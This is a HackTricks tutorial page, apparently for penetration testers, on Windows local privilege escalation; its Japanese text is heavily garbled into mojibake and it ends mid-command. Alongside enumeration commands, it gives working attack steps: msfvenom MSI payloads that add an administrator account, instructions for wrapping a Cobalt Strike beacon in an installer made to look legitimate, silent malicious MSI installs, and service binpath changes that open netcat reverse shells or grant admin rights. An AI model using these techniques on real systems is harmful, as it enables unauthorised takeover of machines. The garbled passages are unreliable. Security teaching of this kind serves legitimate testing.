HackTricks
Windows Local Privilege Escalation
Tip
AWSãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- HackTricksããã³HackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãããã³ã°ããªãã¯ãå ±æããŠãã ããã
Windows ã®ããŒã«ã«ç¹æš©ææ Œãã¯ã¿ãŒãæ¢ãããã®æè¯ã®ããŒã«: WinPEAS
Windows ã®åºæ¬çè«
Access Tokens
Windows Access Tokens ãäœãåãããªãå Žåã¯ãç¶è¡ããåã«æ¬¡ã®ããŒãžãèªãã§ãã ããïŒ
ACLs - DACLs/SACLs/ACEs
ACLs - DACLs/SACLs/ACEs ã«é¢ãã詳现ã¯æ¬¡ã®ããŒãžã確èªããŠãã ããïŒ
Integrity Levels
Windows ã® integrity levels ãäœãåãããªãå Žåã¯ãç¶è¡ããåã«æ¬¡ã®ããŒãžãèªãã§ãã ããïŒ
Windows ã»ãã¥ãªã㣠ã³ã³ãããŒã«
Windows ã«ã¯ãã·ã¹ãã ã®åæã劚ããããå®è¡ãã¡ã€ã«ãå®è¡ã§ããªãããããããªãã®æŽ»åãæ€ç¥ãããããããŸããŸãªèŠçŽ ããããŸããç¹æš©ææ Œã®åæãéå§ããåã«ã次ã®ããŒãžãèªã¿ãããããã¹ãŠã®é²åŸ¡ã¡ã«ããºã ãåæããŠãã ããïŒ
System Info
Version info enumeration
Windows ã®ããŒãžã§ã³ã«æ¢ç¥ã®è匱æ§ããªãã確èªããŠãã ããïŒé©çšãããŠãããããã確èªããããšïŒã
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
ããŒãžã§ã³å¥ Exploits
This site 㯠Microsoft ã®ã»ãã¥ãªãã£è匱æ§ã«é¢ãã詳现æ å ±ãæ€çŽ¢ããã®ã«äŸ¿å©ã§ãã ãã®ããŒã¿ããŒã¹ã«ã¯4,700件以äžã®ã»ãã¥ãªãã£è匱æ§ãç»é²ãããŠãããWindowsç°å¢ãæã€èšå€§ãªæ»æ察象é åã瀺ããŠããŸãã
ã·ã¹ãã äžã§
- post/windows/gather/enum_patches
- post/multi/recon/local_exploit_suggester
- watson
- winpeas (Winpeas ã«ã¯ watson ãçµã¿èŸŒãŸããŠããŸã)
ã·ã¹ãã æ å ±ã䜿çšããŠããŒã«ã«ã§
Github ã® exploits ãªããžããª:
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/abatchy17/WindowsExploits
- https://github.com/SecWiki/windows-kernel-exploits
ç°å¢
èªèšŒæ å ±ãéèŠãªæ å ±ãç°å¢å€æ°ã«ä¿åãããŠããŸããïŒ
set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize
PowerShellã®å±¥æŽ
ConsoleHost_history #Find the PATH where is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
PowerShell ãã©ã³ã¹ã¯ãªãããã¡ã€ã«
ãããæå¹ã«ããæ¹æ³ã¯ https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/ ã§ç¢ºèªã§ããŸãã
#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts
#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript
PowerShell Module Logging
PowerShell ãã€ãã©ã€ã³å®è¡ã®è©³çŽ°ãèšé²ãããŸããèšé²ãããå 容ã«ã¯ãå®è¡ãããã³ãã³ããã³ãã³ãã®åŒã³åºããã¹ã¯ãªããã®äžéšãå«ãŸããŸãããã ããå®è¡ã®å®å šãªè©³çŽ°ãåºåçµæããã¹ãŠãã£ããã£ããããšã¯éããŸããã
To enable this, follow the instructions in the âTranscript filesâ section of the documentation, opting for âModule Loggingâ instead of âPowershell Transcriptionâ.
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
Powershell ãã°ã®çŽè¿15件ã®ã€ãã³ãã衚瀺ããã«ã¯ã次ã®ã³ãã³ããå®è¡ããŸã:
Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
PowerShell Script Block Logging
ã¹ã¯ãªããã®å®è¡ã«é¢ãã掻åãšå 容ã®å®å šãªèšé²ãååŸãããåã³ãŒããããã¯ãå®è¡ããããã³ã«ææžåãããããšãä¿èšŒãããŸãããã®ããã»ã¹ã¯å掻åã®å æ¬çãªç£æ»èšŒè·¡ãä¿æãããã©ã¬ã³ãžãã¯ãæªæããæåã®è§£æã«æçšã§ããå®è¡æã«ãã¹ãŠã®æŽ»åãèšé²ããããšã§ãããã»ã¹ã«é¢ãã詳现ãªæŽå¯ãåŸãããŸãã
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
Script Block ã®ãã°ã€ãã³ãã¯ãWindows ã€ãã³ã ãã¥ãŒã¢ã®æ¬¡ã®ãã¹ã«ãããŸã: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.\
æåŸã® 20 件ã®ã€ãã³ãã衚瀺ããã«ã¯ã次ã䜿çšã§ããŸã:
Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
ã€ã³ã¿ãŒãããèšå®
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
ãã©ã€ã
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
WSUS
æŽæ°ã httpS ã§ã¯ãªã http ã䜿ã£ãŠèŠæ±ãããŠããå Žåãã·ã¹ãã ã䟵害ã§ããŸãã
ãŸãããããã¯ãŒã¯ã non-SSL ã® WSUS ã¢ããããŒãã䜿çšããŠãããã確èªãããããcmd ã§æ¬¡ã®ã³ãã³ããå®è¡ããŸã:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
ãŸãã¯ãPowerShellã§æ¬¡ã®ããã«:
Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"
次ã®ãããªè¿ä¿¡ãè¿ã£ãŠããå ŽåïŒ
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535
WUServer : http://xxxx-updxx.corp.internal.com:8530
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName : windowsupdate
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer or Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" is equals to 1.
Then, it is exploitable. If the last registry is equals to 0, then, the WSUS entry will be ignored.
In orther to exploit this vulnerabilities you can use tools like: Wsuxploit, pyWSUS - These are MiTM weaponized exploits scripts to inject âfakeâ updates into non-SSL WSUS traffic.
Read the research here:
WSUS CVE-2020-1013
Read the complete report here.
Basically, this is the flaw that this bug exploits:
If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorerâs settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.
Furthermore, since the WSUS service uses the current userâs settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current userâs certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.
You can exploit this vulnerability using the tool WSUSpicious (once itâs liberated).
Third-Party Auto-Updaters and Agent IPC (local privesc)
Many enterprise agents expose a localhost IPC surface and a privileged update channel. If enrollment can be coerced to an attacker server and the updater trusts a rogue root CA or weak signer checks, a local user can deliver a malicious MSI that the SYSTEM service installs. See a generalized technique (based on the Netskope stAgentSvc chain â CVE-2025-0309) here:
KrbRelayUp
A local privilege escalation vulnerability exists in Windows domain environments under specific conditions. These conditions include environments where LDAP signing is not enforced, users possess self-rights allowing them to configure Resource-Based Constrained Delegation (RBCD), and the capability for users to create computers within the domain. It is important to note that these requirements are met using default settings.
Find the exploit in https://github.com/Dec0ne/KrbRelayUp
For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/
AlwaysInstallElevated
If these 2 registers are enabled (value is 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Metasploit payloads
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
meterpreterã»ãã·ã§ã³ãããå Žåãã¢ãžã¥ãŒã« exploit/windows/local/always_install_elevated ã䜿ã£ãŠãã®ææ³ãèªååã§ããŸãã
PowerUP
Write-UserAddMSI ã³ãã³ãã PowerUP ãã䜿çšããŠãã«ã¬ã³ããã£ã¬ã¯ããªã« Windows MSI ãã€ããªãäœæããprivilege escalation ãè¡ããŸãã ãã®ã¹ã¯ãªããã¯ããªã³ã³ãã€ã«æžã¿ã® MSI ã€ã³ã¹ããŒã©ãæžãåºãããŠãŒã¶/ã°ã«ãŒãã®è¿œå ãä¿ããŸãïŒãªã®ã§ GIU ã¢ã¯ã»ã¹ãå¿
èŠã§ãïŒïŒ
Write-UserAddMSI
Just execute the created binary to escalate privileges.
MSI Wrapper
Read this tutorial to learn how to create a MSI wrapper using this tools. Note that you can wrap a â.batâ file if you just want to execute command lines
Create MSI with WIX
Create MSI with Visual Studio
- Generate with Cobalt Strike or Metasploit a new Windows EXE TCP payload in
C:\privesc\beacon.exe- Cobalt Strike ãŸã㯠Metasploit ã䜿ã£ãŠã
C:\privesc\beacon.exeãšã㊠new Windows EXE TCP payload ã Generate ããŸãã
- Cobalt Strike ãŸã㯠Metasploit ã䜿ã£ãŠã
- Open Visual Studio, select Create a new project and type âinstallerâ into the search box. Select the Setup Wizard project and click Next.
- Visual Studio ãéããCreate a new project ãéžæããŠæ€çŽ¢ããã¯ã¹ã«ãinstallerããšå ¥åããŸããSetup Wizard ãããžã§ã¯ããéžæã㊠Next ãã¯ãªãã¯ããŸãã
- Give the project a name, like AlwaysPrivesc, use
C:\privescfor the location, select place solution and project in the same directory, and click Create.- ãããžã§ã¯ãåã AlwaysPrivesc ã®ããã«èšå®ãããã±ãŒã·ã§ã³ã«
C:\privescã䜿çšããplace solution and project in the same directory ãéžæã㊠Create ãã¯ãªãã¯ããŸãã
- ãããžã§ã¯ãåã AlwaysPrivesc ã®ããã«èšå®ãããã±ãŒã·ã§ã³ã«
- Keep clicking Next until you get to step 3 of 4 (choose files to include). Click Add and select the Beacon payload you just generated. Then click Finish.
- Next ãç¶ããŠã¯ãªãã¯ãã4 ã¹ãããäžã®ã¹ããã 3ïŒå«ãããã¡ã€ã«ã®éžæïŒãŸã§é²ã¿ãŸããAdd ãã¯ãªãã¯ããŠå ã»ã©çæãã Beacon ãã€ããŒããéžæããFinish ãã¯ãªãã¯ããŸãã
- Highlight the AlwaysPrivesc project in the Solution Explorer and in the Properties, change TargetPlatform from x86 to x64.
- Solution Explorer 㧠AlwaysPrivesc ãããžã§ã¯ããéžæããProperties 㧠TargetPlatform ã x86 ãã x64 ã«å€æŽããŸãã
- There are other properties you can change, such as the Author and Manufacturer which can make the installed app look more legitimate.
- ã€ã³ã¹ããŒã«ãããã¢ããªãããæ£åœãããèŠããããã«ãAuthor ã Manufacturer ã®ãããªä»ã®ããããã£ãå€æŽã§ããŸãã
- Right-click the project and select View > Custom Actions.
- ãããžã§ã¯ããå³ã¯ãªãã¯ã㊠View > Custom Actions ãéžæããŸãã
- Right-click Install and select Add Custom Action.
- Install ãå³ã¯ãªãã¯ã㊠Add Custom Action ãéžæããŸãã
- Double-click on Application Folder, select your beacon.exe file and click OK. This will ensure that the beacon payload is executed as soon as the installer is run.
- Application Folder ãããã«ã¯ãªãã¯ããbeacon.exe ãã¡ã€ã«ãéžæã㊠OK ãã¯ãªãã¯ããŸããããã«ãããã€ã³ã¹ããŒã©ãå®è¡ããããšããã« beacon ãã€ããŒããå®è¡ãããããã«ãªããŸãã
- Under the Custom Action Properties, change Run64Bit to True.
- Custom Action Properties ã®äžã§ Run64Bit ã True ã«å€æŽããŸãã
- Finally, build it.
- æåŸã«ããã«ãããŸãã
- If the warning
File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'is shown, make sure you set the platform to x64.File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'ãšããèŠåã衚瀺ãããå Žåã¯ããã©ãããã©ãŒã ã x64 ã«èšå®ãããŠããããšã確èªããŠãã ããã
MSI Installation
To execute the installation of the malicious .msi file in background:
- æªæã®ãã
.msiãã¡ã€ã«ã® ã€ã³ã¹ããŒã« ã ããã¯ã°ã©ãŠã³ã ã§å®è¡ããã«ã¯ïŒ
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
ãã®è匱æ§ãæªçšããã«ã¯æ¬¡ã䜿çšã§ããŸã: exploit/windows/local/always_install_elevated
ã¢ã³ããŠã€ã«ã¹ãšæ€åº
ç£æ»èšå®
ãããã®èšå®ã¯äœããã°ã«èšé²ããããã決å®ããããã泚æãæãå¿ èŠããããŸãã
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
WEF
Windows Event Forwarding ã¯ããã°ãã©ãã«éä¿¡ãããŠããããç¥ãã®ã¯èå³æ·±ãã§ã
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
LAPS
LAPS ã¯ãã¡ã€ã³ã«åå ããŠããã³ã³ãã¥ãŒã¿äžã® local Administrator passwords ã®ç®¡ç ãç®çã«èšèšãããŠãããåãã¹ã¯ãŒãã äžæã§ã©ã³ãã åãããå®æçã«æŽæ°ããã ããšãä¿èšŒããŸãããããã®ãã¹ã¯ãŒã㯠Active Directory å ã«å®å šã«æ ŒçŽãããACLs ãéããŠååãªæš©éãä»äžããããŠãŒã¶ãŒã®ã¿ãã¢ã¯ã»ã¹ã§ããèš±å¯ãããŠããå Žåã« local admin passwords ãé²èŠ§ã§ããŸãã
WDigest
æå¹ãªå Žåãplain-text passwords are stored in LSASS (Local Security Authority Subsystem Service)ã
More info about WDigest in this page.
reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential
LSA Protection
Windows 8.1以éãMicrosoftã¯Local Security Authority (LSA)ã«å¯Ÿããä¿è·ã匷åããä¿¡é ŒãããŠããªãããã»ã¹ã«ããã¡ã¢ãªã®èªã¿åããã³ãŒãã®æ³šå
¥ãè©Šã¿ãè¡çºããããã¯ããŠãã·ã¹ãã ãããã«ä¿è·ããŸããã
More info about LSA Protection here.
reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
Credentials Guard
Credential Guard 㯠Windows 10 ã§å°å ¥ãããŸãããããã€ã¹ã«ä¿åãããè³æ Œæ å ±ã pass-the-hash æ»æã®ãããªè åšããä¿è·ããããšãç®çãšããŠããŸãã| More info about Credentials Guard here.
reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags
Cached Credentials
Domain credentials 㯠Local Security Authority (LSA) ã«ãã£ãŠèªèšŒããããªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã®ã³ã³ããŒãã³ãã«ãã£ãŠå©çšãããŸãããŠãŒã¶ãŒã®ãã°ãªã³æ
å ±ãç»é²æžã¿ã®ã»ãã¥ãªãã£ããã±ãŒãžã«ãã£ãŠèªèšŒããããšãéåžžãã®ãŠãŒã¶ãŒã® domain credentials ãçæãããŸãã\
More info about Cached Credentials here.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
ãŠãŒã¶ãŒãšã°ã«ãŒã
ãŠãŒã¶ãŒãšã°ã«ãŒãã®åæ
èªåãæå±ããã°ã«ãŒãã®äžã«ãèå³æ·±ãæš©éãæã€ãã®ããªãã確èªããŠãã ããã
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
ç¹æš©ã°ã«ãŒã
ããªãã ããããã®ç¹æš©ã°ã«ãŒãã«å±ããŠããå Žåãæš©éãææ Œã§ããå¯èœæ§ããããŸããç¹æš©ã°ã«ãŒããšãããããæªçšããŠæš©éãææ Œããæ¹æ³ã«ã€ããŠã¯ããã¡ããåç §ããŠãã ãã:
Token manipulation
詳ãã㯠ãã®ããŒãžã§ token ãäœãã確èªããŠãã ãã: Windows Tokens.
次ã®ããŒãžã確èªããŠãèå³æ·±ã tokens ã«ã€ããŠåŠã¶ ãšããããæªçšããæ¹æ³ã確èªããŠãã ãã:
ãã°ãªã³ãŠãŒã¶ãŒ / ã»ãã·ã§ã³
qwinsta
klist sessions
ããŒã ãã©ã«ã
dir C:\Users
Get-ChildItem C:\Users
ãã¹ã¯ãŒãããªã·ãŒ
net accounts
ã¯ãªããããŒãã®å 容ãååŸãã
powershell -command "Get-Clipboard"
å®è¡äžã®ããã»ã¹
ãã¡ã€ã«ãšãã©ã«ãã®æš©é
ãŸããããã»ã¹ãåæããŠãããã»ã¹ã® command line å
ã«ãã¹ã¯ãŒãããªããã確èªããã
å®è¡äžã® binary ãäžæžãã§ãããããŸã㯠binary folder ã«æžã蟌ã¿æš©éããããã確èªããŠãå¯èœãª DLL Hijacking attacks ãæªçšã§ããã調ã¹ãïŒ
Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes
#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
åžžã«electron/cef/chromium debuggers running, you could abuse it to escalate privilegesã
ããã»ã¹ã®ãã€ããªã®ããŒããã·ã§ã³ã確èªãã
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)
ããã»ã¹ã®ãã€ããªã®ãã©ã«ãã®æš©éããã§ãã¯ãã (DLL Hijacking)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)
Memory Password mining
å®è¡äžã®ããã»ã¹ã®ã¡ã¢ãªãã³ã㯠sysinternals ã® procdump ã䜿ã£ãŠäœæã§ããŸããFTP ã®ãããªãµãŒãã¹ã¯ credentials in clear text in memory ãä¿æããŠããããšããããã¡ã¢ãªããã³ãããŠãã® credentials ãèªã¿åã£ãŠã¿ãŠãã ããã
procdump.exe -accepteula -ma <proc_name_tasklist>
å®å šã§ãªã GUI ã¢ããª
SYSTEM ãšããŠå®è¡ãããŠããã¢ããªã±ãŒã·ã§ã³ã¯ããŠãŒã¶ãŒã« CMD ãèµ·åããããããã£ã¬ã¯ããªãåç §ããããããå¯èœæ§ããããŸãã
Example: âWindows Help and Supportâ (Windows + F1), search for âcommand promptâ, click on âClick to open Command Promptâ
ãµãŒãã¹
Service Triggers ã«ãããWindows ã¯ç¹å®ã®æ¡ä»¶ïŒnamed pipe/RPC endpoint activityãETW eventsãIP availabilityãdevice arrivalãGPO refresh ãªã©ïŒãçºçããéã«ãµãŒãã¹ãèµ·åã§ããŸããSERVICE_START rights ããªããŠããããªã¬ãŒãçºçãããããšã§æš©éã®é«ããµãŒãã¹ãèµ·åã§ããããšããããããŸããåæãšèµ·åã®ææ³ã¯ä»¥äžãåç §ããŠãã ãã:
ãµãŒãã¹ã®äžèŠ§ãååŸãã:
net start
wmic service list brief
sc query
Get-Service
æš©é
ãµãŒãã¹ã®æ å ±ãååŸããã«ã¯ sc ã䜿çšã§ããŸãã
sc qc <service_name>
åãµãŒãã¹ã®å¿ èŠãªç¹æš©ã¬ãã«ã確èªããããã«ãSysinternals ã®ãã€ã㪠accesschk ãçšæããŠããããšãæšå¥šããŸãã
accesschk.exe -ucqv <Service_Name> #Check rights for different groups
âAuthenticated Usersâãä»»æã®ãµãŒãã¹ãå€æŽã§ãããã©ãã確èªããããšãæšå¥šããŸã:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
ããããXPçšaccesschk.exeãããŠã³ããŒãã§ããŸã
ãµãŒãã¹ãæå¹å
ãã®ãšã©ãŒãçºçããŠããå ŽåïŒäŸïŒSSDPSRVïŒ:
System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
次ã®ã³ãã³ãã§æå¹ã«ã§ããŸã
sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""
ãµãŒãã¹ upnphost ãåäœããã«ã¯ SSDPSRV ã«äŸåããŠããããšã«æ³šæããŠãã ãã (for XP SP1)
ãã®åé¡ã®å¥ã®åé¿çã¯æ¬¡ãå®è¡ããããšã§ã:
sc.exe config usosvc start= auto
ãµãŒãã¹ã®ãã€ããªãã¹ãå€æŽãã
ãAuthenticated usersãã°ã«ãŒãããµãŒãã¹ã«å¯Ÿã㊠SERVICE_ALL_ACCESS ãæã£ãŠããå ŽåããµãŒãã¹ã®å®è¡å¯èœãªãã€ããªãå€æŽããããšãå¯èœã§ããå€æŽããŠå®è¡ããã«ã¯ sc:
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
ãµãŒãã¹ã®åèµ·å
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
ç¹æš©ã¯ä»¥äžã®ãããªããŸããŸãªæš©éãéããŠææ Œã§ããŸã:
- SERVICE_CHANGE_CONFIG: ãµãŒãã¹ãã€ããªã®åèšå®ãå¯èœã«ããŸãã
- WRITE_DAC: æš©éã®åèšå®ãå¯èœã«ããçµæãšããŠãµãŒãã¹æ§æãå€æŽããèœåã«ã€ãªãããŸãã
- WRITE_OWNER: æææš©ã®ååŸãšæš©éã®åèšå®ãèš±å¯ããŸãã
- GENERIC_WRITE: ãµãŒãã¹æ§æãå€æŽããèœåãå«ã¿ãŸãã
- GENERIC_ALL: åæ§ã«ãµãŒãã¹æ§æãå€æŽããèœåãå«ã¿ãŸãã
ãã®è匱æ§ã®æ€åºãšæªçšã«ã¯ã exploit/windows/local/service_permissions ãå©çšã§ããŸãã
ãµãŒãã¹ãã€ããªã®åŒ±ãæš©é
Check if you can modify the binary that is executed by a service or if you have write permissions on the folder where the binary is located (DLL Hijacking).
ãµãŒãã¹ã«ãã£ãŠå®è¡ããããã¹ãŠã®ãã€ããªã¯ wmic ã䜿ã£ãŠååŸã§ãïŒsystem32 ã§ã¯ãªãïŒãæš©é㯠icacls ã§ç¢ºèªã§ããŸã:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
ãŸããsc ãš icacls ã䜿çšã§ããŸã:
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
ãµãŒãã¹ã¬ãžã¹ããªã®å€æŽæš©é
ä»»æã®ãµãŒãã¹ã¬ãžã¹ããªãå€æŽã§ããã確èªããŠãã ãã.
ãµãŒãã¹ã®ã¬ãžã¹ããªã«å¯Ÿããæš©éã確èªããã«ã¯ã次ã®ããã«ããŸã:
reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
Authenticated Users ãŸã㯠NT AUTHORITY\INTERACTIVE ã FullControl æš©éãæã£ãŠããã確èªããŠãã ããããããããªãããµãŒãã¹ã«ãã£ãŠå®è¡ããããã€ããªãå€æŽã§ããŸãã
å®è¡ããããã€ããªã®ãã¹ãå€æŽããã«ã¯ïŒ
reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
Services registry AppendData/AddSubdirectory æš©é
ã¬ãžã¹ããªã«å¯ŸããŠãã®æš©éãæã£ãŠããå Žåããã®ã¬ãžã¹ããªãããµãã¬ãžã¹ããªãäœæã§ããŸããWindows services ã®å Žåãããã¯ä»»æã®ã³ãŒããå®è¡ããã®ã«ååã§ã:
AppendData/AddSubdirectory permission over service registry
Unquoted Service Paths
å®è¡ãã¡ã€ã«ãžã®ãã¹ãåŒçšç¬Šã§å²ãŸããŠããªãå ŽåãWindows ã¯ç©ºçœã®çŽåãŸã§ã®ååè£ãé ã«å®è¡ããããšããŸãã
äŸãã°ããã¹ C:\Program Files\Some Folder\Service.exe ã®å ŽåãWindows ã¯ä»¥äžãå®è¡ããããšããŸãïŒ
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
çµã¿èŸŒã¿ã® Windows ãµãŒãã¹ã«å±ãããã®ãé€ããåŒçšç¬Šã§å²ãŸããŠããªããã¹ãŠã®ãµãŒãã¹ãã¹ãäžèŠ§è¡šç€º:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"' # Not only auto services
# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
